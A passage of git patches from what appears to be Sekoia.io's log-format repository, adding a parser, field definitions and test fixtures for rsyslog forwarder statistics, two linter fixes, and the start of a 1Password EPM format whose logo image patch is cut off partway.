diff --git a/SekoiaIO/forwarder_log/_meta/smart-descriptions.json b/SekoiaIO/forwarder_log/_meta/smart-descriptions.json
new file mode 100644
index 000000000..f973866e9
--- /dev/null
+++ b/SekoiaIO/forwarder_log/_meta/smart-descriptions.json
@@ -0,0 +1,63 @@
+[
+    {
+      "value": "{sekoiaio.forwarder.action.processed} messages processed with {sekoiaio.forwarder.action.failed} failed for intake {sekoiaio.forwarder.intake.name}",
+      "conditions": [
+        {
+            "field": "sekoiaio.forwarder.action.processed"
+          },
+          {
+            "field": "sekoiaio.forwarder.action.failed"
+          },
+          {
+            "field": "sekoiaio.forwarder.intake.name"
+          }
+      ]
+      
+    },
+    {
+        "value": "{sekoiaio.forwarder.input.submitted} messages received on port {sekoiaio.forwarder.input.port} for intake {sekoiaio.forwarder.intake.name}",
+        "conditions": [
+            {
+              "field": "sekoiaio.forwarder.input.submitted"
+            },
+            {
+              "field": "sekoiaio.forwarder.input.port"
+            },
+            {
+              "field": "sekoiaio.forwarder.intake.name"
+            }
+        ]
+        
+      },
+      {
+        "value": "Statistics for {sekoiaio.forwarder.module.name} queue: Current size: {sekoiaio.forwarder.queue.size}, Total enqueued: {sekoiaio.forwarder.queue.enqueued}",
+        "conditions": [
+            {
+              "field": "sekoiaio.forwarder.module.type",
+              "value": "core.queue"
+            },
+            {
+              "field": "sekoiaio.forwarder.module.name"
+            },
+            {
+              "field": "sekoiaio.forwarder.queue.size"
+            },
+            {
+              "field": "sekoiaio.forwarder.queue.enqueued"
+            }
+        ]
+        
+      },
+      {
+        "value": "Forwarder stats received for module {sekoiaio.forwarder.module.type} named {sekoiaio.forwarder.module.name}",
+        "conditions": [
+            {
+              "field": "sekoiaio.forwarder.module.name"
+            },
+            {
+              "field": "sekoiaio.forwarder.module.type"
+            }
+        ]
+        
+      }
+]
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/ingest/parser.yml b/SekoiaIO/forwarder_log/ingest/parser.yml
new file mode 100644
index 000000000..ee671e5c7
--- /dev/null
+++ b/SekoiaIO/forwarder_log/ingest/parser.yml
@@ -0,0 +1,37 @@
+name: Sekoiaio Forwarder logs
+pipeline:
+  - name: json
+    external:
+      name: json.parse-json
+      properties:
+        input_field: "{{original.message}}"
+        output_field: event
+
+  - name: set_common_fields
+stages: 
+  set_common_fields:
+      actions:
+        - set:
+            user.domain: "SEKOIA.IO"
+            sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}"
+            sekoiaio.forwarder.module.name: "{{json.event.name}}"
+            sekoiaio.forwarder.module.type: "{{json.event.origin}}"
+            sekoiaio.forwarder.action.processed: "{{json.event.processed}}"
+            sekoiaio.forwarder.action.failed: "{{json.event.failed}}"
+            sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}"
+            sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}"
+            sekoiaio.forwarder.queue.size: "{{json.event.size}}"
+            sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}"
+            sekoiaio.forwarder.queue.full: "{{json.event.full}}"
+            sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}"
+            sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}"
+            sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}"
+            sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}"
+            sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}"
+            sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}"
+            sekoiaio.forwarder.stats.utime: "{{json.event.utime}}"
+            sekoiaio.forwarder.stats.stime: "{{json.event.stime}}"
+            sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}"
+
+
+        
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/action_log.json b/SekoiaIO/forwarder_log/tests/action_log.json
new file mode 100644
index 000000000..fe8e1aa28
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/action_log.json
@@ -0,0 +1,28 @@
+{
+  "input": {
+    "message": "{\"name\":\"output-techno1\",\"origin\":\"core.action\",\"processed\": 0,\"failed\": 0,\"suspended\": 0, \"suspended.duration\": 0, \"resumed\": 0}"
+  },
+  "expected": {
+    "message": "{\"name\":\"output-techno1\",\"origin\":\"core.action\",\"processed\": 0,\"failed\": 0,\"suspended\": 0, \"suspended.duration\": 0, \"resumed\": 0}",
+    "sekoiaio": {
+      "forwarder": {
+        "action": {
+          "failed": 0,
+          "processed": 0,
+          "resumed": 0,
+          "suspended": 0
+        },
+        "intake": {
+          "name": "techno1"
+        },
+        "module": {
+          "name": "output-techno1",
+          "type": "core.action"
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/da_queue_log.json b/SekoiaIO/forwarder_log/tests/da_queue_log.json
new file mode 100644
index 000000000..e37cd085f
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/da_queue_log.json
@@ -0,0 +1,32 @@
+{
+  "input": {
+    "message": "{ \"name\": \"ruleset-my-techno1[DA]\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"ruleset-my-techno1[DA]\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }",
+    "sekoiaio": {
+      "forwarder": {
+        "intake": {
+          "name": "my-techno1"
+        },
+        "module": {
+          "name": "ruleset-my-techno1[DA]",
+          "type": "core.queue"
+        },
+        "queue": {
+          "discarded": {
+            "full": 0,
+            "nf": 0
+          },
+          "enqueued": 0,
+          "full": 0,
+          "maxqsize": 0,
+          "size": 0
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/input_tcp.json b/SekoiaIO/forwarder_log/tests/input_tcp.json
new file mode 100644
index 000000000..bc907046a
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/input_tcp.json
@@ -0,0 +1,26 @@
+{
+  "input": {
+    "message": "{ \"name\": \"input-techno1(20516)\", \"origin\": \"imtcp\", \"submitted\": 0 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"input-techno1(20516)\", \"origin\": \"imtcp\", \"submitted\": 0 }",
+    "sekoiaio": {
+      "forwarder": {
+        "input": {
+          "port": "20516",
+          "submitted": 0
+        },
+        "intake": {
+          "name": "techno1"
+        },
+        "module": {
+          "name": "input-techno1(20516)",
+          "type": "imtcp"
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/input_udp.json b/SekoiaIO/forwarder_log/tests/input_udp.json
new file mode 100644
index 000000000..96b69fe2f
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/input_udp.json
@@ -0,0 +1,26 @@
+{
+  "input": {
+    "message": "{ \"name\": \"input-my-techno2(*/20517/IPv4)\", \"origin\": \"imudp\", \"submitted\": 0, \"disallowed\": 0 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"input-my-techno2(*/20517/IPv4)\", \"origin\": \"imudp\", \"submitted\": 0, \"disallowed\": 0 }",
+    "sekoiaio": {
+      "forwarder": {
+        "input": {
+          "port": "*/20517/IPv4",
+          "submitted": 0
+        },
+        "intake": {
+          "name": "my-techno2"
+        },
+        "module": {
+          "name": "input-my-techno2(*/20517/IPv4)",
+          "type": "imudp"
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/memory_queue_log.json b/SekoiaIO/forwarder_log/tests/memory_queue_log.json
new file mode 100644
index 000000000..ca28db9a5
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/memory_queue_log.json
@@ -0,0 +1,32 @@
+{
+  "input": {
+    "message": "{ \"name\": \"ruleset-techno1\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"ruleset-techno1\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }",
+    "sekoiaio": {
+      "forwarder": {
+        "intake": {
+          "name": "techno1"
+        },
+        "module": {
+          "name": "ruleset-techno1",
+          "type": "core.queue"
+        },
+        "queue": {
+          "discarded": {
+            "full": 0,
+            "nf": 0
+          },
+          "enqueued": 0,
+          "full": 0,
+          "maxqsize": 0,
+          "size": 0
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/output_log.json b/SekoiaIO/forwarder_log/tests/output_log.json
new file mode 100644
index 000000000..592b5c615
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/output_log.json
@@ -0,0 +1,27 @@
+{
+  "input": {
+    "message": "{ \"name\": \"TCP-intake.sekoia.io-10514\", \"origin\": \"omfwd\", \"bytes.sent\": 0 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"TCP-intake.sekoia.io-10514\", \"origin\": \"omfwd\", \"bytes.sent\": 0 }",
+    "sekoiaio": {
+      "forwarder": {
+        "intake": {
+          "name": "intake.sekoia.io-10514"
+        },
+        "module": {
+          "name": "TCP-intake.sekoia.io-10514",
+          "type": "omfwd"
+        },
+        "output": {
+          "bytes": {
+            "sent": 0
+          }
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/stats.json b/SekoiaIO/forwarder_log/tests/stats.json
new file mode 100644
index 000000000..4ed525d49
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/stats.json
@@ -0,0 +1,27 @@
+{
+  "input": {
+    "message": "{ \"name\": \"resource-usage\", \"origin\": \"impstats\", \"utime\": 134625, \"stime\": 20397, \"maxrss\": 13888, \"minflt\": 1510, \"majflt\": 0, \"inblock\": 0, \"oublock\": 272, \"nvcsw\": 347, \"nivcsw\": 31, \"openfiles\": 15 }"
+  },
+  "expected": {
+    "message": "{ \"name\": \"resource-usage\", \"origin\": \"impstats\", \"utime\": 134625, \"stime\": 20397, \"maxrss\": 13888, \"minflt\": 1510, \"majflt\": 0, \"inblock\": 0, \"oublock\": 272, \"nvcsw\": 347, \"nivcsw\": 31, \"openfiles\": 15 }",
+    "sekoiaio": {
+      "forwarder": {
+        "intake": {
+          "name": "usage"
+        },
+        "module": {
+          "name": "resource-usage",
+          "type": "impstats"
+        },
+        "stats": {
+          "openfiles": 15,
+          "stime": 20397,
+          "utime": 134625
+        }
+      }
+    },
+    "user": {
+      "domain": "SEKOIA.IO"
+    }
+  }
+}
\ No newline at end of file

From f7ca14b95e95bfda95bdb2c344f4d3d6f05f85cc Mon Sep 17 00:00:00 2001
From: Pierre Penhouet <pierre.penhouet@sekoia.io>
Date: Mon, 16 Sep 2024 23:59:55 +0200
Subject: [PATCH 038/317] Fix lintier

---
 SekoiaIO/forwarder_log/_meta/fields.yml | 105 ++++++++++++------------
 1 file changed, 54 insertions(+), 51 deletions(-)

diff --git a/SekoiaIO/forwarder_log/_meta/fields.yml b/SekoiaIO/forwarder_log/_meta/fields.yml
index a172f31a9..70ea30cab 100644
--- a/SekoiaIO/forwarder_log/_meta/fields.yml
+++ b/SekoiaIO/forwarder_log/_meta/fields.yml
@@ -1,26 +1,16 @@
-sekoiaio.forwarder.module.type:
-  description: This identifies the module type for which the statistics are being reported
-  name: sekoiaio.forwarder.module.type
-  type: keyword
-
-sekoiaio.forwarder.module.name:
-  description: This identifies the module name for which the statistics are being reported
-  name: sekoiaio.forwarder.module.name
-  type: keyword
-
-sekoiaio.forwarder.intake.name:
-  description: Intake name defined in the forwarder
-  name: sekoiaio.forwarder.intake.name
-  type: keyword
+sekoiaio.forwarder.action.failed:
+  description: Number of messages failed in the action
+  name: sekoiaio.forwarder.action.failed
+  type: number
 
 sekoiaio.forwarder.action.processed:
   description: Number of messages processed by the action
   name: sekoiaio.forwarder.action.processed
   type: number
 
-sekoiaio.forwarder.action.failed:
-  description: Number of messages failed in the action
-  name: sekoiaio.forwarder.action.failed
+sekoiaio.forwarder.action.resumed:
+  description: Number of messages resumed by the action
+  name: sekoiaio.forwarder.action.resumed
   type: number
 
 sekoiaio.forwarder.action.suspended:
@@ -28,24 +18,36 @@ sekoiaio.forwarder.action.suspended:
   name: sekoiaio.forwarder.action.suspended
   type: number
 
-sekoiaio.forwarder.action.resumed:
-  description: Number of messages resumed by the action
-  name: sekoiaio.forwarder.action.resumed
-  type: number
+sekoiaio.forwarder.input.port:
+  description: Input port use by the forwarder
+  name: sekoiaio.forwarder.input.port
+  type: keyword
 
-sekoiaio.forwarder.queue.size:
-  description: Number of messages in the queue
-  name: sekoiaio.forwarder.queue.size
+sekoiaio.forwarder.input.submitted:
+  description: Number of messages handled by the forwarder input
+  name: sekoiaio.forwarder.input.submitted
   type: number
 
-sekoiaio.forwarder.queue.enqueued:
-  description: Total number of messages enqueued into this queue since startup
-  name: sekoiaio.forwarder.queue.enqueued
-  type: number
+sekoiaio.forwarder.intake.name:
+  description: Intake name defined in the forwarder
+  name: sekoiaio.forwarder.intake.name
+  type: keyword
 
-sekoiaio.forwarder.queue.full:
-  description: Number of times the queue was actually full and could not accept additional messages
-  name: sekoiaio.forwarder.queue.full
+sekoiaio.forwarder.module.name:
+  description: This identifies the module name for which the statistics are being
+    reported
+  name: sekoiaio.forwarder.module.name
+  type: keyword
+
+sekoiaio.forwarder.module.type:
+  description: This identifies the module type for which the statistics are being
+    reported
+  name: sekoiaio.forwarder.module.type
+  type: keyword
+
+sekoiaio.forwarder.output.bytes.sent:
+  description: Number of bytes sent to Sekoia
+  name: sekoiaio.forwarder.output.bytes.sent
   type: number
 
 sekoiaio.forwarder.queue.discarded.full:
@@ -58,29 +60,31 @@ sekoiaio.forwarder.queue.discarded.nf:
   name: sekoiaio.forwarder.queue.discarded.nf
   type: number
 
-sekoiaio.forwarder.queue.maxqsize:
-  description: The maximum amount of messages that have passed through the queue since rsyslog was started
-  name: sekoiaio.forwarder.queue.maxqsize
+sekoiaio.forwarder.queue.enqueued:
+  description: Total number of messages enqueued into this queue since startup
+  name: sekoiaio.forwarder.queue.enqueued
   type: number
 
-sekoiaio.forwarder.output.bytes.sent:
-  description: Number of bytes sent to Sekoia
-  name: sekoiaio.forwarder.output.bytes.sent
+sekoiaio.forwarder.queue.full:
+  description: Number of times the queue was actually full and could not accept additional
+    messages
+  name: sekoiaio.forwarder.queue.full
   type: number
 
-sekoiaio.forwarder.input.submitted:
-  description: Number of messages handled by the forwarder input
-  name: sekoiaio.forwarder.input.submitted
+sekoiaio.forwarder.queue.maxqsize:
+  description: The maximum amount of messages that have passed through the queue since
+    rsyslog was started
+  name: sekoiaio.forwarder.queue.maxqsize
   type: number
 
-sekoiaio.forwarder.input.port:
-  description: Input port use by the forwarder
-  name: sekoiaio.forwarder.input.port
-  type: keyword
+sekoiaio.forwarder.queue.size:
+  description: Number of messages in the queue
+  name: sekoiaio.forwarder.queue.size
+  type: number
 
-sekoiaio.forwarder.stats.utime:
-  description: The amount of user CPU time consumed by rsyslog, in milliseconds.
-  name: sekoiaio.forwarder.stats.utime
+sekoiaio.forwarder.stats.openfiles:
+  description: Number of file handles used by rsyslog
+  name: sekoiaio.forwarder.stats.openfiles
   type: number
 
 sekoiaio.forwarder.stats.stime:
@@ -88,8 +92,7 @@ sekoiaio.forwarder.stats.stime:
   name: sekoiaio.forwarder.stats.stime
   type: number
 
-sekoiaio.forwarder.stats.openfiles:
-  description: Number of file handles used by rsyslog
-  name: sekoiaio.forwarder.stats.openfiles
+sekoiaio.forwarder.stats.utime:
+  description: The amount of user CPU time consumed by rsyslog, in milliseconds.
+  name: sekoiaio.forwarder.stats.utime
   type: number
-

From 17ee0554793daedf59589241f3f31aeef67fd1e4 Mon Sep 17 00:00:00 2001
From: Pierre Penhouet <pierre.penhouet@sekoia.io>
Date: Tue, 17 Sep 2024 00:08:11 +0200
Subject: [PATCH 039/317] Fix linter

---
 SekoiaIO/forwarder_log/ingest/parser.yml | 49 +++++++++++-------------
 1 file changed, 23 insertions(+), 26 deletions(-)

diff --git a/SekoiaIO/forwarder_log/ingest/parser.yml b/SekoiaIO/forwarder_log/ingest/parser.yml
index ee671e5c7..66cc5b540 100644
--- a/SekoiaIO/forwarder_log/ingest/parser.yml
+++ b/SekoiaIO/forwarder_log/ingest/parser.yml
@@ -8,30 +8,27 @@ pipeline:
         output_field: event
 
   - name: set_common_fields
-stages: 
+stages:
   set_common_fields:
-      actions:
-        - set:
-            user.domain: "SEKOIA.IO"
-            sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}"
-            sekoiaio.forwarder.module.name: "{{json.event.name}}"
-            sekoiaio.forwarder.module.type: "{{json.event.origin}}"
-            sekoiaio.forwarder.action.processed: "{{json.event.processed}}"
-            sekoiaio.forwarder.action.failed: "{{json.event.failed}}"
-            sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}"
-            sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}"
-            sekoiaio.forwarder.queue.size: "{{json.event.size}}"
-            sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}"
-            sekoiaio.forwarder.queue.full: "{{json.event.full}}"
-            sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}"
-            sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}"
-            sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}"
-            sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}"
-            sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}"
-            sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}"
-            sekoiaio.forwarder.stats.utime: "{{json.event.utime}}"
-            sekoiaio.forwarder.stats.stime: "{{json.event.stime}}"
-            sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}"
-
-
-        
\ No newline at end of file
+    actions:
+      - set:
+          user.domain: "SEKOIA.IO"
+          sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}"
+          sekoiaio.forwarder.module.name: "{{json.event.name}}"
+          sekoiaio.forwarder.module.type: "{{json.event.origin}}"
+          sekoiaio.forwarder.action.processed: "{{json.event.processed}}"
+          sekoiaio.forwarder.action.failed: "{{json.event.failed}}"
+          sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}"
+          sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}"
+          sekoiaio.forwarder.queue.size: "{{json.event.size}}"
+          sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}"
+          sekoiaio.forwarder.queue.full: "{{json.event.full}}"
+          sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}"
+          sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}"
+          sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}"
+          sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}"
+          sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}"
+          sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}"
+          sekoiaio.forwarder.stats.utime: "{{json.event.utime}}"
+          sekoiaio.forwarder.stats.stime: "{{json.event.stime}}"
+          sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}"

From bb25ceae66d6902ded7ef89de932185714037ccb Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Mon, 16 Sep 2024 21:12:43 +0300
Subject: [PATCH 040/317] Add 1Password EPM format

---
 1Password/1password-epm/CHANGELOG.md          |   8 ++
 1Password/1password-epm/_meta/fields.yml      |  44 ++++++++
 1Password/1password-epm/_meta/logo.png        | Bin 0 -> 11824 bytes
 1Password/1password-epm/_meta/manifest.yml    |  11 ++
 .../_meta/smart-descriptions.json             |  29 +++++
 1Password/1password-epm/ingest/parser.yml     | 105 ++++++++++++++++++
 .../tests/test_audit_events.json              |  65 +++++++++++
 .../tests/test_item_usage_events.json         |  60 ++++++++++
 .../tests/test_sign_in_attempts.json          |  59 ++++++++++
 1Password/README.md                           |   7 ++
 1Password/_meta/logo.png                      | Bin 0 -> 11824 bytes
 1Password/_meta/manifest.yml                  |   5 +
 12 files changed, 393 insertions(+)
 create mode 100644 1Password/1password-epm/CHANGELOG.md
 create mode 100644 1Password/1password-epm/_meta/fields.yml
 create mode 100644 1Password/1password-epm/_meta/logo.png
 create mode 100644 1Password/1password-epm/_meta/manifest.yml
 create mode 100644 1Password/1password-epm/_meta/smart-descriptions.json
 create mode 100644 1Password/1password-epm/ingest/parser.yml
 create mode 100644 1Password/1password-epm/tests/test_audit_events.json
 create mode 100644 1Password/1password-epm/tests/test_item_usage_events.json
 create mode 100644 1Password/1password-epm/tests/test_sign_in_attempts.json
 create mode 100644 1Password/README.md
 create mode 100644 1Password/_meta/logo.png
 create mode 100644 1Password/_meta/manifest.yml

diff --git a/1Password/1password-epm/CHANGELOG.md b/1Password/1password-epm/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/1Password/1password-epm/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/1Password/1password-epm/_meta/fields.yml b/1Password/1password-epm/_meta/fields.yml
new file mode 100644
index 000000000..114fc1d9b
--- /dev/null
+++ b/1Password/1password-epm/_meta/fields.yml
@@ -0,0 +1,44 @@
+1password.category:
+  description: ''
+  name: 1password.category
+  type: keyword
+
+1password.item_uuid:
+  description: ''
+  name: 1password.item_uuid
+  type: keyword
+
+1password.object.email:
+  description: ''
+  name: 1password.object.email
+  type: keyword
+
+1password.object.name:
+  description: ''
+  name: 1password.object.name
+  type: keyword
+
+1password.object.type:
+  description: ''
+  name: 1password.object.type
+  type: keyword
+
+1password.object.uuid:
+  description: ''
+  name: 1password.object.uuid
+  type: keyword
+
+1password.session_uuid:
+  description: ''
+  name: 1password.session_uuid
+  type: keyword
+
+1password.type:
+  description: ''
+  name: 1password.type
+  type: keyword
+
+1password.vault_uuid:
+  description: ''
+  name: 1password.vault_uuid
+  type: keyword
diff --git a/1Password/1password-epm/_meta/logo.png b/1Password/1password-epm/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..d8fbd396e5dd798f4530be439b902acae10c5f19
GIT binary patch
literal 11824
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
